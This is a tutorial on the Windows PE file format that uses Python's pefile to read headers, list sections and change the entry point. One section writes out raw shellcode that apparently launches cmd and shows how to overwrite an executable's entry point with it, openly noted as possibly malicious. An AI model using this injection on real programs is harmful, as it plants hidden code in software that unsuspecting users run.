PE stands for Portable Executable, the native file format of Win32. The format is the same across all Win32 platforms. All Win32 executables use it: Control Panel applets (.CPL), 32-bit DLLs, COM files, .NET executables, and even NT kernel-mode drivers. Note that VxDs (virtual device drivers) and 16-bit DLLs do not use the PE file format.

PE file format:

[Figure: PE file structure]

The general layout of a PE file is shown in the figure. A PE file mainly consists of a DOS header, a PE header, and sections. Let's look at each part.

DOS MZ header: A PE file starts with a 64-byte DOS header. Its structure (IMAGE_DOS_HEADER) is defined in winnt.h or windows.inc and has 19 members, of which two, e_magic and e_lfanew, matter most.

e_magic: holds the bytes 4Dh, 5Ah ("MZ", for Mark Zbikowski, one of the MS-DOS designers), which mark a valid DOS header. Read as a little-endian WORD, the value is 0x5A4D.

e_lfanew: holds the file offset of the PE header. The PE signature sits at the start of the PE header.

DOS Stub: A small, valid DOS program. When the file is run on a system that does not recognize the PE format, such as plain DOS, the stub runs instead, usually just to print a message saying that the program cannot be run in DOS mode.
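As a minimal sketch of how these two fields can be read by hand, the snippet below uses Python's standard struct module on a synthetic 64-byte header. The function name read_dos_header and the sample bytes are assumptions made for illustration; they are not part of any library.

```python
import struct

def read_dos_header(data):
    """Return (e_magic, e_lfanew) from the first 64 bytes of a file."""
    if len(data) < 64:
        raise ValueError("too short to hold a DOS header")
    # e_magic is the WORD at offset 0; e_lfanew is the DWORD at offset 0x3C.
    (e_magic,) = struct.unpack_from("<H", data, 0)
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_magic != 0x5A4D:  # bytes 4Dh 5Ah ("MZ") read little-endian
        raise ValueError("missing MZ signature")
    return e_magic, e_lfanew

# Synthetic header (illustration only): "MZ", zero padding, e_lfanew = 0xE8.
sample = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0xE8)
magic, lfanew = read_dos_header(sample)
print(hex(magic), hex(lfanew))
```

With a real file, the first 64 bytes read from disk would take the place of sample.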

PE Header: Its structure is IMAGE_NT_HEADERS, which contains the fields the PE loader needs. It is defined in windows.inc and has three main parts:

Signature: a 32-bit DWORD containing the bytes 50h, 45h, 00h, 00h ("PE" followed by two zero bytes).

FileHeader: the next 20 bytes of the PE file (IMAGE_FILE_HEADER). It describes the physical layout and properties of the file, e.g. the number of sections.

OptionalHeader: the next 224 bytes in a 32-bit (PE32) file (IMAGE_OPTIONAL_HEADER). 64-bit (PE32+) files use 240 bytes, and the exact size is given by SizeOfOptionalHeader in the file header. It describes the logical layout of the PE file, e.g. AddressOfEntryPoint, ImageBase, SectionAlignment, FileAlignment, SizeOfImage, SizeOfHeaders and DataDirectory. DataDirectory is an array of 16 IMAGE_DATA_DIRECTORY structures occupying the last 128 bytes; its entries locate tables such as the import table and the import address table.
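The layout just described can be checked with a short sketch that validates the signature, unpacks the 20-byte file header, and computes where the optional header ends. The helper name read_file_header and the synthetic buffer are assumptions for illustration; the field values are the ones from the notepad.exe dump shown later in this article.

```python
import struct

FILE_HEADER_FORMAT = "<HHIIIHH"  # IMAGE_FILE_HEADER, 20 bytes
FILE_HEADER_FIELDS = (
    "Machine", "NumberOfSections", "TimeDateStamp", "PointerToSymbolTable",
    "NumberOfSymbols", "SizeOfOptionalHeader", "Characteristics",
)

def read_file_header(data, e_lfanew):
    """Check the PE signature and unpack the file header that follows it."""
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    values = struct.unpack_from(FILE_HEADER_FORMAT, data, e_lfanew + 4)
    header = dict(zip(FILE_HEADER_FIELDS, values))
    # Signature (4) + file header (20) + optional header = start of section table.
    header["SectionTableOffset"] = e_lfanew + 4 + 20 + header["SizeOfOptionalHeader"]
    return header

# Synthetic buffer (illustration only): padding up to e_lfanew, then the headers.
e_lfanew = 0xE8
data = b"\x00" * e_lfanew + b"PE\x00\x00" + struct.pack(
    FILE_HEADER_FORMAT, 0x8664, 6, 0x4A5BC9B3, 0, 0, 0xF0, 0x22)
header = read_file_header(data, e_lfanew)
print(header["NumberOfSections"], hex(header["SectionTableOffset"]))
```

The computed offset, 0x1F0, matches the file offset at which the dump later in this article places the first section header.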

SectionTable: an array of IMAGE_SECTION_HEADER structures, one per section. The number of sections varies from file to file, and each section has its own attributes. Code or data with common attributes is grouped into one section. Some common sections are:

Code section: .text -> executable instructions
Data sections: .bss -> uninitialized variables; .rdata -> read-only data; .data -> initialized variables
Export data: .edata -> names and addresses of exported functions, as well as the Export Directory
Import data: .idata -> names of imported functions and variables, as well as the Import Descriptors and the IAT
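Each entry of the section table is a fixed 40-byte record. The sketch below unpacks one such record with the struct module; read_section_header is a hypothetical helper, and the sample record is built from the .text values that appear in the dump later in this article.

```python
import struct

SECTION_HEADER_FORMAT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes

def read_section_header(data, offset=0):
    """Unpack one section header into a dict of its main fields."""
    (name, virtual_size, virtual_address, size_of_raw_data,
     pointer_to_raw_data, _reloc_ptr, _line_ptr, _reloc_count,
     _line_count, characteristics) = struct.unpack_from(
        SECTION_HEADER_FORMAT, data, offset)
    return {
        # The name is an 8-byte field padded with zero bytes.
        "Name": name.rstrip(b"\x00").decode("ascii", "replace"),
        "VirtualSize": virtual_size,
        "VirtualAddress": virtual_address,
        "SizeOfRawData": size_of_raw_data,
        "PointerToRawData": pointer_to_raw_data,
        "Characteristics": characteristics,
    }

# Synthetic record (illustration only) using the .text values from the dump.
raw = struct.pack(SECTION_HEADER_FORMAT, b".text", 0xA770, 0x1000,
                  0xA800, 0x600, 0, 0, 0, 0, 0x60000020)
text = read_section_header(raw)
print(text["Name"], hex(text["VirtualAddress"]), hex(text["PointerToRawData"]))
```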

When a PE file is loaded into memory, the following steps occur:

  • When we run a PE file, the PE loader first examines the DOS MZ header for the offset of the PE header. If the offset is found, the loader skips to the PE header; otherwise the DOS stub is executed.
  • The PE loader then checks the validity of the PE header. If it is valid, the loader goes to the end of the PE header.
  • The PE loader reads the information about the sections from the section table and maps those sections into memory using file mapping. It also gives each section the attributes specified in the section table.
  • After the PE file is mapped into memory, the PE loader concerns itself with the logical parts of the PE file, such as the import table.
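The mapping step implies a simple piece of arithmetic: a section's bytes live at PointerToRawData in the file but at VirtualAddress (an RVA, relative to the image base) once loaded. The sketch below translates an RVA back to a file offset. The Section tuple and rva_to_offset are hypothetical names for illustration; the numbers are the .text values and entry point shown later in this article.

```python
from collections import namedtuple

# Hypothetical record holding the fields of a section header used for mapping.
Section = namedtuple(
    "Section", "name virtual_address virtual_size raw_pointer raw_size")

def rva_to_offset(rva, sections):
    """Translate an RVA to a file offset, or return None if no section holds it."""
    for s in sections:
        delta = rva - s.virtual_address
        # The RVA must lie inside the section and be backed by bytes on disk.
        if 0 <= delta < s.virtual_size and delta < s.raw_size:
            return s.raw_pointer + delta
    return None

sections = [Section(".text", 0x1000, 0xA770, 0x600, 0xA800)]
entry_point_rva = 0x3570
print(hex(rva_to_offset(entry_point_rva, sections)))  # 0x2b70
```

Here 0x3570 - 0x1000 + 0x600 = 0x2B70, so the entry point of this file sits at file offset 0x2B70.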

[Do Some Practical]:

PE Headers: Basic PE information can be retrieved by reading the following attributes:

  • DOS_HEADER
  • FILE_HEADER
  • OPTIONAL_HEADER

Using the pefile module in Python, we can print the header information:

>>> import pefile
>>> ab = "notepad.exe"
>>> pe = pefile.PE(ab)
>>> print(pe.DOS_HEADER)

Output:

[IMAGE_DOS_HEADER]
0x0        0x0   e_magic:                       0x5A4D
0x2        0x2   e_cblp:                        0x90
0x4        0x4   e_cp:                          0x3
0x6        0x6   e_crlc:                        0x0
0x8        0x8   e_cparhdr:                     0x4
0xA        0xA   e_minalloc:                    0x0
0xC        0xC   e_maxalloc:                    0xFFFF
0xE        0xE   e_ss:                          0x0
0x10       0x10  e_sp:                          0xB8
0x12       0x12  e_csum:                        0x0
0x14       0x14  e_ip:                          0x0
0x16       0x16  e_cs:                          0x0
0x18       0x18  e_lfarlc:                      0x40
0x1A       0x1A  e_ovno:                        0x0
0x1C       0x1C  e_res:
0x24       0x24  e_oemid:                       0x0
0x26       0x26  e_oeminfo:                     0x0
0x28       0x28  e_res2:
0x3C       0x3C  e_lfanew:                      0xE8

Similarly, we can print NT_HEADERS, FILE_HEADER and OPTIONAL_HEADER:

>>> print(pe.NT_HEADERS)
>>> print(pe.OPTIONAL_HEADER)
>>> print(pe.FILE_HEADER)
[IMAGE_FILE_HEADER]
0xEC       0x0   Machine:                       0x8664
0xEE       0x2   NumberOfSections:              0x6
0xF0       0x4   TimeDateStamp:                 0x4A5BC9B3 [Mon Jul 13 23:56:35 2009 UTC]
0xF4       0x8   PointerToSymbolTable:          0x0
0xF8       0xC   NumberOfSymbols:               0x0
0xFC       0x10  SizeOfOptionalHeader:          0xF0
0xFE       0x12  Characteristics:               0x22
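The TimeDateStamp field is a count of seconds since 1 January 1970 UTC, which is why the dump can show it as a date. A minimal sketch of the conversion, using only the standard library (decode_timestamp is a hypothetical helper name):

```python
from datetime import datetime, timezone

def decode_timestamp(value):
    """Convert a PE TimeDateStamp (seconds since the Unix epoch) to UTC."""
    return datetime.fromtimestamp(value, tz=timezone.utc)

stamp = decode_timestamp(0x4A5BC9B3)
print(stamp.strftime("%a %b %d %H:%M:%S %Y UTC"))  # Mon Jul 13 23:56:35 2009 UTC
```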

We can also read a specific field:

>>> print("e_magic value = %s" % hex(pe.DOS_HEADER.e_magic))
e_magic value = 0x5a4d
>>> print("e_lfanew value = %s" % hex(pe.DOS_HEADER.e_lfanew))
e_lfanew value = 0xe8
>>> print("Address of Entry Point = %s" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
Address of Entry Point = 0x3570
>>> print("Number of Sections = %s" % hex(pe.FILE_HEADER.NumberOfSections))
Number of Sections = 0x6
>>> print("Number of Data_Directories = %d" % pe.OPTIONAL_HEADER.NumberOfRvaAndSizes)
Number of Data_Directories = 16

PE Sections:

Using the same pe object, we can retrieve each section's header and attributes.

>>> for section in pe.sections:
...     print("\t" + section.Name.decode().rstrip("\x00"))
...
	.text
	.rdata
	.data
	.pdata
	.rsrc
	.reloc

To display an individual section:

>>> print(pe.sections[0])
[IMAGE_SECTION_HEADER]
0x1F0      0x0   Name:                          .text
0x1F8      0x8   Misc:                          0xA770
0x1F8      0x8   Misc_PhysicalAddress:          0xA770
0x1F8      0x8   Misc_VirtualSize:              0xA770
0x1FC      0xC   VirtualAddress:                0x1000
0x200      0x10  SizeOfRawData:                 0xA800
0x204      0x14  PointerToRawData:              0x600
0x208      0x18  PointerToRelocations:          0x0
0x20C      0x1C  PointerToLinenumbers:          0x0
0x210      0x20  NumberOfRelocations:           0x0
0x212      0x22  NumberOfLinenumbers:           0x0
0x214      0x24  Characteristics:               0x60000020
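The Characteristics value of a section is a bit mask of attributes. As a rough sketch, the snippet below decodes a few of the commonly seen flags; the table lists only a subset of the flags defined for the format (names shortened from their IMAGE_SCN_ prefix), and decode_section_flags is a hypothetical helper.

```python
# Subset of the section flags, keyed by bit value (IMAGE_SCN_ prefix omitted).
SECTION_FLAGS = {
    0x00000020: "CNT_CODE",
    0x00000040: "CNT_INITIALIZED_DATA",
    0x00000080: "CNT_UNINITIALIZED_DATA",
    0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ",
    0x80000000: "MEM_WRITE",
}

def decode_section_flags(characteristics):
    """Return the names of the known flags set in a Characteristics value."""
    return [name for bit, name in sorted(SECTION_FLAGS.items())
            if characteristics & bit]

print(decode_section_flags(0x60000020))
```

For the .text value 0x60000020 this yields CNT_CODE, MEM_EXECUTE and MEM_READ: the section contains code and is mapped readable and executable, but not writable.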

Similarly, we can retrieve the data directories:

>>> for d_dir in pe.OPTIONAL_HEADER.DATA_DIRECTORY:
...     print(d_dir)
...
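Each data directory entry is just a pair of DWORDs, an RVA and a size, and its meaning comes from its position in the array. The sketch below unpacks the 128-byte array by hand. The helper read_data_directories is hypothetical, and the sample import-table values (RVA 0x2000, size 0x50) are made up for illustration, not taken from notepad.exe.

```python
import struct

# Meaning of each slot, by index (IMAGE_DIRECTORY_ENTRY_ prefix omitted).
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
    "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]

def read_data_directories(raw):
    """Unpack 16 (VirtualAddress, Size) pairs from a 128-byte array."""
    entries = []
    for index, name in enumerate(DIRECTORY_NAMES):
        rva, size = struct.unpack_from("<II", raw, index * 8)
        entries.append((name, rva, size))
    return entries

# Synthetic array (illustration only): every slot empty except IMPORT.
raw = bytearray(128)
struct.pack_into("<II", raw, 1 * 8, 0x2000, 0x50)
for name, rva, size in read_data_directories(bytes(raw)):
    if size:
        print(name, hex(rva), hex(size))
```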

We can dump all attributes with a single command:

>>> print(pe.dump_info())

Modify Address Of Entry Point:

We can change the entry point address to the OEP (Original Entry Point). This helps when manually unpacking a packed file, where AddressOfEntryPoint has to be changed to the OEP.

>>> import pefile
>>> aud = "audconv.exe"
>>> pe = pefile.PE(aud)
>>> print("Address_Of_Entry_Point = %s" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
Address_Of_Entry_Point = 0x36201
>>> pe.OPTIONAL_HEADER.AddressOfEntryPoint = 0x40000
>>> pe.write(filename="audio.exe")
>>> print("Address_Of_Entry_Point = %s" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
Address_Of_Entry_Point = 0x40000
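To see what such a change amounts to at the byte level, here is a rough sketch that patches the field directly in a buffer. It relies on AddressOfEntryPoint being the DWORD at offset 16 of the optional header, which holds for both PE32 and PE32+. The function set_entry_point and the synthetic image are assumptions for illustration and say nothing about how pefile implements write().

```python
import struct

# PE signature (4) + file header (20) + offset of the field in the optional header (16).
ENTRY_POINT_FIELD_OFFSET = 4 + 20 + 16

def set_entry_point(image, new_rva):
    """Overwrite AddressOfEntryPoint in a bytearray; return the old value."""
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    field = e_lfanew + ENTRY_POINT_FIELD_OFFSET
    (old_rva,) = struct.unpack_from("<I", image, field)
    struct.pack_into("<I", image, field, new_rva)
    return old_rva

# Synthetic image (illustration only): just enough header bytes to patch.
image = bytearray(0x200)
image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, 0x80)              # e_lfanew
image[0x80:0x84] = b"PE\x00\x00"                        # PE signature
struct.pack_into("<I", image, 0x80 + ENTRY_POINT_FIELD_OFFSET, 0x36201)

old = set_entry_point(image, 0x40000)
print(hex(old))
```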

Inject Code at Entry Point:

We can inject code (possibly malicious) into the executable at the entry point, so that our code executes when the application runs. For the injection we use the set_bytes_at_offset() method, which returns True or False depending on whether the operation succeeded. Because AddressOfEntryPoint is an RVA and set_bytes_at_offset() expects a file offset, the RVA is first converted with get_offset_from_rva().

>>> import pefile
>>> aud = "audconv.exe"
>>> pe = pefile.PE(aud)
>>> print("Address %s" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint))
Address 0x36201
>>> x = pe.OPTIONAL_HEADER.AddressOfEntryPoint
>>> shellcode = (b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
...     b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
...     b"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
...     b"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
...     b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
...     b"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
...     b"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
...     b"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
...     b"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
...     b"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
...     b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
...     b"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
...     b"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x00")
>>> print("write %d bytes at entry point RVA %s" % (len(shellcode), hex(x)))
write 195 bytes at entry point RVA 0x36201
>>> offset = pe.get_offset_from_rva(x)
>>> pe.set_bytes_at_offset(offset, shellcode)
True
>>> pe.write(filename="newaud.exe")
>>> pe.write("abcd.exe")

set_bytes_at_offset() takes two parameters, offset and data. offset is the file offset of the destination where the data is copied. data holds the code to be copied (bytes in Python 3, str in Python 2).

Differentiate between DLL and EXE:

There are many GUI tools for analyzing PE files, such as Resource Hacker, PE Explorer, PEBrowse, Dependency Walker, PEiD and PEview. We can differentiate between an EXE and a DLL by looking at the Characteristics field of the file header: a DLL has the IMAGE_FILE_DLL flag (0x2000) set. An easy way is to load the file into PE Explorer and check the Characteristics field, which tells whether the file is a DLL or an EXE.
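The same check can be sketched in a few lines of Python on the raw Characteristics value. The function classify_image is a hypothetical helper, and the second sample value (0x2022) is made up for illustration. Note that this simple test does not separate drivers from ordinary executables. pefile also offers is_dll() and is_exe() methods on the PE object for this purpose.

```python
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000

def classify_image(characteristics):
    """Classify a file header Characteristics value as DLL, EXE or unknown."""
    if characteristics & IMAGE_FILE_DLL:
        return "DLL"
    if characteristics & IMAGE_FILE_EXECUTABLE_IMAGE:
        return "EXE"
    return "unknown"

print(classify_image(0x22))    # the notepad.exe value from the dump above
print(classify_image(0x2022))  # same flags plus IMAGE_FILE_DLL
```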
